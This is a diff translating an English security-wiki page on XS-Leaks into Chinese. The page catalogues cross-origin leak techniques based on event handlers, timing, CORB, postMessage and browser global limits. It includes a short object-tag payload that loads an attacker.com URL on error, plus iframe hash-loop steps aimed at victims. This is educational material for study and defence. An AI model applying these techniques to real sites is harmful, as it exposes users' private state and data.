+可以分析多个方面以区分易受攻击的网络的状态：
 
-- **Status Code**: Distinguishing between **various HTTP response status codes** cross-origin, like server errors, client errors, or authentication errors.
-- **API Usage**: Identifying **usage of Web APIs** across pages, revealing whether a cross-origin page employs a specific JavaScript Web API.
-- **Redirects**: Detecting navigations to different pages, not just HTTP redirects but also those triggered by JavaScript or HTML.
-- **Page Content**: Observing **variations in the HTTP response body** or in page sub-resources, such as the **number of embedded frames** or size disparities in images.
-- **HTTP Header**: Noting the presence or possibly the value of a **specific HTTP response header**, including headers like X-Frame-Options, Content-Disposition, and Cross-Origin-Resource-Policy.
-- **Timing**: Noticing consistent time disparities between the two states.
+- **状态码**：区分 **各种 HTTP 响应状态码** 跨源，如服务器错误、客户端错误或身份验证错误。
+- **API 使用**：识别跨页面的 **Web API 使用**，揭示跨源页面是否使用特定的 JavaScript Web API。
+- **重定向**：检测导航到不同页面，不仅是 HTTP 重定向，还有由 JavaScript 或 HTML 触发的重定向。
+- **页面内容**：观察 **HTTP 响应体中的变化** 或页面子资源中的变化，例如 **嵌入框的数量** 或图像的大小差异。
+- **HTTP 头**：注意 **特定 HTTP 响应头** 的存在或可能的值，包括 X-Frame-Options、Content-Disposition 和 Cross-Origin-Resource-Policy 等头。
+- **时间**：注意两个状态之间的一致时间差异。
 
-### Inclusion Methods
+### 包含方法
 
-- **HTML Elements**: HTML offers various elements for **cross-origin resource inclusion**, like stylesheets, images, or scripts, compelling the browser to request a non-HTML resource. A compilation of potential HTML elements for this purpose can be found at [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks).
-- **Frames**: Elements such as **iframe**, **object**, and **embed** can embed HTML resources directly into the attacker's page. If the page **lacks framing protection**, JavaScript can access the framed resource’s window object via the contentWindow property.
-- **Pop-ups**: The **`window.open`** method opens a resource in a new tab or window, providing a **window handle** for JavaScript to interact with methods and properties following the SOP. Pop-ups, often used in single sign-on, circumvent framing and cookie restrictions of a target resource. However, modern browsers restrict pop-up creation to certain user actions.
-- **JavaScript Requests**: JavaScript permits direct requests to target resources using **XMLHttpRequests** or the **Fetch API**. These methods offer precise control over the request, like opting to follow HTTP redirects.
+- **HTML 元素**：HTML 提供了多种用于 **跨源资源包含** 的元素，如样式表、图像或脚本，迫使浏览器请求非 HTML 资源。可以在 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks) 找到此目的的潜在 HTML 元素的汇编。
+- **框架**：如 **iframe**、**object** 和 **embed** 的元素可以将 HTML 资源直接嵌入攻击者的页面。如果页面 **缺乏框架保护**，JavaScript 可以通过 contentWindow 属性访问框架资源的窗口对象。
+- **弹出窗口**：**`window.open`** 方法在新标签页或窗口中打开资源，为 JavaScript 提供 **窗口句柄** 以与遵循 SOP 的方法和属性进行交互。弹出窗口通常用于单点登录，绕过目标资源的框架和 cookie 限制。然而，现代浏览器将弹出窗口的创建限制为某些用户操作。
+- **JavaScript 请求**：JavaScript 允许使用 **XMLHttpRequests** 或 **Fetch API** 直接请求目标资源。这些方法提供对请求的精确控制，例如选择跟随 HTTP 重定向。
 
-### Leak Techniques
+### 泄漏技术
 
-- **Event Handler**: A classical leak technique in XS-Leaks, where event handlers like **onload** and **onerror** provide insights about resource loading success or failure.
-- **Error Messages**: JavaScript exceptions or special error pages can provide leak information either directly from the error message or by differentiating between its presence and absence.
-- **Global Limits**: Physical limitations of a browser, like memory capacity or other enforced browser limits, can signal when a threshold is reached, serving as a leak technique.
-- **Global State**: Detectable interactions with browsers' **global states** (e.g., the History interface) can be exploited. For instance, the **number of entries** in a browser's history can offer clues about cross-origin pages.
-- **Performance API**: This API provides **performance details of the current page**, including network timing for the document and loaded resources, enabling inferences about requested resources.
-- **Readable Attributes**: Some HTML attributes are **readable cross-origin** and can be used as a leak technique. For instance, the `window.frame.length` property allows JavaScript to count the frames included in a webpage cross-origin.
+- **事件处理程序**：XS-Leaks 中的经典泄漏技术，事件处理程序如 **onload** 和 **onerror** 提供有关资源加载成功或失败的见解。
+- **错误消息**：JavaScript 异常或特殊错误页面可以直接从错误消息中提供泄漏信息，或通过区分其存在与否来提供信息。
+- **全局限制**：浏览器的物理限制，如内存容量或其他强制的浏览器限制，可以在达到阈值时发出信号，作为泄漏技术。
+- **全局状态**：可检测的与浏览器 **全局状态**（例如，历史接口）的交互可以被利用。例如，浏览器历史中的 **条目数量** 可以提供有关跨源页面的线索。
+- **性能 API**：此 API 提供 **当前页面的性能细节**，包括文档和加载资源的网络时序，使得对请求资源的推断成为可能。
+- **可读属性**：某些 HTML 属性是 **跨源可读** 的，可以用作泄漏技术。例如，`window.frame.length` 属性允许 JavaScript 计算网页中包含的框架数量。
 
-## XSinator Tool & Paper
+## XSinator 工具与论文
 
-XSinator is an automatic tool to **check browsers against several know XS-Leaks** explained in its paper: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
+XSinator 是一个自动化工具，用于 **检查浏览器是否存在多个已知的 XS-Leaks**，在其论文中进行了说明：[**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
 
-You can **access the tool in** [**https://xsinator.com/**](https://xsinator.com/)
+您可以在 [**https://xsinator.com/**](https://xsinator.com/) **访问该工具**
 
 > [!WARNING]
-> **Excluded XS-Leaks**: We had to exclude XS-Leaks that rely on **service workers** as they would interfere with other leaks in XSinator. Furthermore, we chose to **exclude XS-Leaks that rely on misconfiguration and bugs in a specific web application**. For example, CrossOrigin Resource Sharing (CORS) misconfigurations, postMessage leakage or Cross-Site Scripting. Additionally, we excluded timebased XS-Leaks since they often suffer from being slow, noisy and inaccurate.
+> **排除的 XS-Leaks**：我们不得不排除依赖于 **服务工作者** 的 XS-Leaks，因为它们会干扰 XSinator 中的其他泄漏。此外，我们选择 **排除依赖于特定 Web 应用程序中的错误配置和漏洞的 XS-Leaks**。例如，跨源资源共享（CORS）错误配置、postMessage 泄漏或跨站脚本。此外，我们还排除了基于时间的 XS-Leaks，因为它们通常存在缓慢、嘈杂和不准确的问题。
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
-## **Timing Based techniques**
+## **基于时间的技术**
 
-Some of the following techniques are going to use timing to as part of the process to detect differences in the possible states of the web pages. There are different ways to measure time in a web browser.
+以下一些技术将使用时间作为检测网页可能状态差异的过程的一部分。测量时间在网页浏览器中有不同的方法。
 
-**Clocks**: The [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API allows developers to get high-resolution timing measurements.\
-There are a considerable number of APIs attackers can abuse to create implicit clocks: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS animations, and others.\
-For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/).
+**时钟**： [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API 允许开发人员获取高分辨率的时间测量。\
+攻击者可以滥用大量 API 来创建隐式时钟：[Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API)、[Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel)、[requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame)、[setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout)、CSS 动画等。\
+更多信息请参见：[https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/)。
 
-## Event Handler Techniques
+## 事件处理程序技术
 
 ### Onload/Onerror
 
-- **Inclusion Methods**: Frames, HTML Elements
-- **Detectable Difference**: Status Code
-- **More info**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu), [https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
-- **Summary**: if trying to load a resource onerror/onload events are triggered with the resource is loaded successfully/unsuccessfully it's possible to figure out the status code.
-- **Code example**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
+- **包含方法**：框架，HTML 元素
+- **可检测差异**：状态码
+- **更多信息**：[https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu)，[https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
+- **总结**：如果尝试加载资源，onerror/onload 事件在资源成功/失败加载时被触发，可以推断出状态码。
+- **代码示例**：[https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
 
 {{#ref}}
 cookie-bomb-+-onerror-xs-leak.md
 {{#endref}}
 
-The code example try lo **load scripts objects from JS**, but **other tags** such as objects, stylesheets, images, audios could be also used. Moreover, it's also possible to inject the **tag directly** and declare the `onload` and `onerror` events inside the tag (instead of injecting it from JS).
-
-There is also a script-less version of this attack:
+代码示例尝试 **从 JS 加载脚本对象**，但 **其他标签** 如对象、样式表、图像、音频也可以使用。此外，还可以直接注入 **标签** 并在标签内声明 `onload` 和 `onerror` 事件（而不是从 JS 注入）。
 
+此攻击还有一个无脚本版本：
 ```html
 <object data="//example.com/404">
-  <object data="//attacker.com/?error"></object>
+<object data="//attacker.com/?error"></object>
 </object>
 ```
+在这种情况下，如果 `example.com/404` 未找到，将加载 `attacker.com/?error`。
 
-In this case if `example.com/404` is not found `attacker.com/?error` will be loaded.
+### 加载时机
 
-### Onload Timing
-
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
-- **Summary:** The [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** can be used to measure how much time it takes to perform a request. However, other clocks could be used, such as [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming) which can identify tasks running for more than 50ms.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) another example in:
+- **包含方法**: HTML 元素
+- **可检测差异**: 时机（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
+- **总结:** [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** 可用于测量执行请求所需的时间。然而，也可以使用其他时钟，例如 [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming)，它可以识别运行超过 50 毫秒的任务。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) 另一个示例在：
 
 {{#ref}}
 performance.now-example.md
 {{#endref}}
 
-#### Onload Timing + Forced Heavy Task
+#### 加载时机 + 强制重任务
 
-This technique is just like the previous one, but the **attacker** will also **force** some action to take a **relevant amount time** when the **answer is positive or negative** and measure that time.
+此技术与前一种相似，但 **攻击者** 还将 **强制** 一些操作以花费 **相关的时间**，无论 **答案是正面还是负面**，并测量该时间。
 
 {{#ref}}
 performance.now-+-force-heavy-task.md
 {{#endref}}
 
-### unload/beforeunload Timing
+### 卸载/卸载前时机
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
-- **Summary:** The [SharedArrayBuffer clock](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers) can be used to measure how much time it takes to perform a request. Other clocks could be used.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
+- **包含方法**: 框架
+- **可检测差异**: 时机（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
+- **总结:** [SharedArrayBuffer 时钟](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers) 可用于测量执行请求所需的时间。也可以使用其他时钟。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
 
-The time taken to fetch a resource can be measured by utilizing the [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) and [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) events. The **`beforeunload`** event is fired when the browser is about to navigate to a new page, while the **`unload`** event occurs when the navigation is actually taking place. The time difference between these two events can be calculated to determine the **duration the browser spent fetching the resource**.
+获取资源所需的时间可以通过利用 [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) 和 [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) 事件来测量。**`beforeunload`** 事件在浏览器即将导航到新页面时触发，而 **`unload`** 事件在实际进行导航时发生。这两个事件之间的时间差可以计算出 **浏览器获取资源所花费的时间**。
 
-### Sandboxed Frame Timing + onload <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
+### 沙箱框架时机 + 加载 <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
-- **Summary:** The [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API can be used to measure how much time it takes to perform a request. Other clocks could be used.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
-
-It has been observed that in the absence of [Framing Protections](https://xsleaks.dev/docs/defenses/opt-in/xfo/), the time required for a page and its subresources to load over the network can be measured by an attacker. This measurement is typically possible because the `onload` handler of an iframe is triggered only after the completion of resource loading and JavaScript execution. To bypass the variability introduced by script execution, an attacker might employ the [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) attribute within the `<iframe>`. The inclusion of this attribute restricts numerous functionalities, notably the execution of JavaScript, thereby facilitating a measurement that is predominantly influenced by network performance.
+- **包含方法**: 框架
+- **可检测差异**: 时机（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
+- **总结:** [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API 可用于测量执行请求所需的时间。也可以使用其他时钟。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
 
+已观察到，在没有 [框架保护](https://xsleaks.dev/docs/defenses/opt-in/xfo/) 的情况下，攻击者可以测量页面及其子资源在网络上加载所需的时间。此测量通常是可能的，因为 iframe 的 `onload` 处理程序仅在资源加载和 JavaScript 执行完成后触发。为了绕过脚本执行引入的可变性，攻击者可能会在 `<iframe>` 中使用 [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) 属性。包含此属性会限制许多功能，特别是 JavaScript 的执行，从而促进主要受网络性能影响的测量。
 ```javascript
 // Example of an iframe with the sandbox attribute
 <iframe src="example.html" sandbox></iframe>
 ```
-
 ### #ID + error + onload
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
-- **More info**:
-- **Summary**: If you can make the page error when the correct content is accessed and make it load correctly when any content is accessed, then you can make a loop to extract all the information without measuring the time.
-- **Code Example**:
+- **包含方法**: Frames
+- **可检测差异**: 页面内容
+- **更多信息**:
+- **总结**: 如果你可以在访问正确内容时使页面出错，并在访问任何内容时使其正确加载，那么你可以创建一个循环来提取所有信息，而无需测量时间。
+- **代码示例**:
 
-Suppose that you can **insert** the **page** that has the **secret** content **inside an Iframe**.
+假设你可以**插入**包含**秘密**内容的**页面****在一个 Iframe** 中。
 
-You can **make the victim search** for the file that contains "_**flag**_" using an **Iframe** (exploiting a CSRF for example). Inside the Iframe you know that the _**onload event**_ will be **executed always at least once**. Then, you can **change** the **URL** of the **iframe** but changing only the **content** of the **hash** inside the URL.
+你可以**让受害者搜索**包含 "_**flag**_" 的文件，使用一个**Iframe**（例如利用 CSRF）。在 Iframe 内，你知道 _**onload 事件**_ 将**至少执行一次**。然后，你可以**更改** **iframe** 的 **URL**，但只更改 **URL** 中 **hash** 的 **内容**。
 
-For example:
+例如：
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-If the first URL was **successfully loaded**, then, when **changing** the **hash** part of the URL the **onload** event **won't be triggered** again. But **if** the page had some kind of **error** when **loading**, then, the **onload** event will be **triggered again**.
+如果第一个 URL **成功加载**，那么，当**更改** URL 的 **hash** 部分时，**onload** 事件**不会再次触发**。但是**如果**页面在**加载**时出现某种**错误**，那么，**onload** 事件将**再次触发**。
 
-Then, you can **distinguish between** a **correctly** loaded page or page that has an **error** when is accessed.
+然后，你可以**区分**一个**正确**加载的页面或在访问时有**错误**的页面。
 
-### Javascript Execution
+### Javascript 执行
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
-- **More info**:
-- **Summary:** If the **page** is **returning** the **sensitive** content, **or** a **content** that can be **controlled** by the user. The user could set **valid JS code in the negative case**, an **load** each try inside **`<script>`** tags, so in **negative** cases attackers **code** is **executed,** and in **affirmative** cases **nothing** will be executed.
-- **Code Example:**
+- **包含方法**: Frames
+- **可检测差异**: 页面内容
+- **更多信息**:
+- **总结**: 如果**页面**返回**敏感**内容，**或**用户可以**控制**的**内容**。用户可以在**负面情况下**设置**有效的 JS 代码**，并在每次尝试中**加载**在 **`<script>`** 标签内，因此在**负面**情况下攻击者的**代码**被**执行**，而在**肯定**情况下**什么**都不会被执行。
+- **代码示例**:
 
 {{#ref}}
 javascript-execution-xs-leak.md
@@ -180,505 +176,502 @@ javascript-execution-xs-leak.md
 
 ### CORB - Onerror
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Status Code & Headers
-- **More info**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
-- **Summary**: **Cross-Origin Read Blocking (CORB)** is a security measure that prevents web pages from loading certain sensitive cross-origin resources to protect against attacks like **Spectre**. However, attackers can exploit its protective behavior. When a response subject to **CORB** returns a _**CORB protected**_ `Content-Type` with `nosniff` and a `2xx` status code, **CORB** strips the response's body and headers. Attackers observing this can infer the combination of the **status code** (indicating success or error) and the `Content-Type` (denoting whether it's protected by **CORB**), leading to potential information leakage.
-- **Code Example:**
+- **包含方法**: HTML 元素
+- **可检测差异**: 状态码 & 头部
+- **更多信息**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
+- **总结**: **跨源读取阻止 (CORB)** 是一种安全措施，防止网页加载某些敏感的跨源资源，以保护免受**Spectre**等攻击。然而，攻击者可以利用其保护行为。当受**CORB**保护的响应返回带有 `nosniff` 的 _**CORB 保护**_ `Content-Type` 和 `2xx` 状态码时，**CORB** 会剥离响应的主体和头部。观察到这一点的攻击者可以推断出**状态码**（指示成功或错误）和 `Content-Type`（表示是否受**CORB**保护）的组合，从而导致潜在的信息泄露。
+- **代码示例**:
 
-Check the more information link for more information about the attack.
+查看更多信息链接以获取有关攻击的更多信息。
 
 ### onblur
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
-- **Summary**: Leak sensitive data from the id or name attribute.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
+- **包含方法**: Frames
+- **可检测差异**: 页面内容
+- **更多信息**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
+- **总结**: 从 id 或 name 属性泄露敏感数据。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
 
-It's possible to **load a page** inside an **iframe** and use the **`#id_value`** to make the page **focus on the element** of the iframe with indicated if, then if an **`onblur`** signal is triggered, the ID element exists.\
-You can perform the same attack with **`portal`** tags.
+可以**在一个 iframe 中加载一个页面**并使用 **`#id_value`** 使页面**聚焦于**指定的 iframe 元素，如果触发了**`onblur`** 信号，则 ID 元素存在。\
+你可以使用 **`portal`** 标签执行相同的攻击。
 
-### postMessage Broadcasts <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
+### postMessage 广播 <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: API Usage
-- **More info**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
-- **Summary**: Gather sensitive information from a postMessage or use the presence of postMessages as an oracle to know the status of the user in the page
-- **Code Example**: `Any code listening for all postMessages.`
+- **包含方法**: Frames, Pop-ups
+- **可检测差异**: API 使用
+- **更多信息**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
+- **总结**: 从 postMessage 收集敏感信息或使用 postMessages 的存在作为一个神谕，以了解用户在页面上的状态
+- **代码示例**: `任何监听所有 postMessages 的代码。`
 
-Applications frequently utilize [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to communicate across different origins. However, this method can inadvertently expose **sensitive information** if the `targetOrigin` parameter is not properly specified, allowing any window to receive the messages. Furthermore, the mere act of receiving a message can act as an **oracle**; for instance, certain messages might only be sent to users who are logged in. Therefore, the presence or absence of these messages can reveal information about the user's state or identity, such as whether they are authenticated or not.
+应用程序经常利用 [`postMessage` 广播](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) 在不同源之间进行通信。然而，如果 `targetOrigin` 参数未正确指定，此方法可能会无意中暴露**敏感信息**，允许任何窗口接收消息。此外，接收消息的行为本身可以充当一个**神谕**；例如，某些消息可能仅发送给已登录的用户。因此，这些消息的存在或缺失可以揭示有关用户状态或身份的信息，例如他们是否经过身份验证。
 
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=xs-search) 轻松构建和**自动化工作流**，由世界上**最先进**的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
 
-## Global Limits Techniques
+## 全局限制技术
 
 ### WebSocket API
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: API Usage
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
-- **Summary**: Exhausting the WebSocket connection limit leaks the number of WebSocket connections of a cross-origin page.
-- **Code Example**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)>), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)>)
+- **包含方法**: Frames, Pop-ups
+- **可检测差异**: API 使用
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
+- **总结**: 耗尽 WebSocket 连接限制泄露跨源页面的 WebSocket 连接数量。
+- **代码示例**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)>), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)>)
 
-It is possible to identify if, and how many, **WebSocket connections a target page uses**. It allows an attacker to detect application states and leak information tied to the number of WebSocket connections.
+可以识别目标页面使用了多少个**WebSocket 连接**。这使攻击者能够检测应用程序状态并泄露与 WebSocket 连接数量相关的信息。
 
-If one **origin** uses the **maximum amount of WebSocket** connection objects, regardless of their connections state, the creation of **new objects will result in JavaScript exceptions**. To execute this attack, the attacker website opens the target website in a pop-up or iframe and then, after the target web has been loaded, attempts to create the maximum number of WebSockets connections possible. The **number of thrown exceptions** is the **number of WebSocket connections used by the target website** window.
+如果一个**源**使用了**最大数量的 WebSocket** 连接对象，无论其连接状态如何，创建**新对象将导致 JavaScript 异常**。要执行此攻击，攻击者网站在弹出窗口或 iframe 中打开目标网站，然后在目标网页加载后，尝试创建尽可能多的 WebSocket 连接。**抛出的异常数量**就是目标网站使用的**WebSocket 连接数量**。
 
-### Payment API
+### 支付 API
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: API Usage
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
-- **Summary**: Detect Payment Request because only one can be active at a time.
-- **Code Example**: [https://xsinator.com/testing.html#Payment%20API%20Leak](https://xsinator.com/testing.html#Payment%20API%20Leak)
+- **包含方法**: Frames, Pop-ups
+- **可检测差异**: API 使用
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
+- **总结**: 检测支付请求，因为一次只能有一个处于活动状态。
+- **代码示例**: [https://xsinator.com/testing.html#Payment%20API%20Leak](https://xsinator.com/testing.html#Payment%20API%20Leak)
 
-This XS-Leak enables an attacker to **detect when a cross-origin page initiates a payment request**.
+此 XS-Leak 使攻击者能够**检测跨源页面何时发起支付请求**。
 
-Because **only one request payment can be active** at the same time, if the target website is using the Payment Request API, any f**urther attempts to show use this API will fail**, and cause a **JavaScript exception**. The attacker can exploit this by **periodically attempting to show the Payment API UI**. If one attempt causes an exception, the target website is currently using it. The attacker can hide these periodical attempts by immediately closing the UI after creation.
+因为**一次只能有一个支付请求处于活动状态**，如果目标网站使用支付请求 API，任何进一步尝试使用此 API 的请求将失败，并导致**JavaScript 异常**。攻击者可以通过**定期尝试显示支付 API UI**来利用这一点。如果一次尝试导致异常，则目标网站当前正在使用它。攻击者可以通过在创建后立即关闭 UI 来隐藏这些定期尝试。
 
-### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
+### 事件循环计时 <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
-- **Inclusion Methods**:
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop)
-- **Summary:** Measure execution time of a web abusing the single-threaded JS event loop.
-- **Code Example**:
+- **包含方法**:
+- **可检测差异**: 时间（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop)
+- **总结**: 测量一个网页的执行时间，利用单线程的 JS 事件循环。
+- **代码示例**:
 
 {{#ref}}
 event-loop-blocking-+-lazy-images.md
 {{#endref}}
 
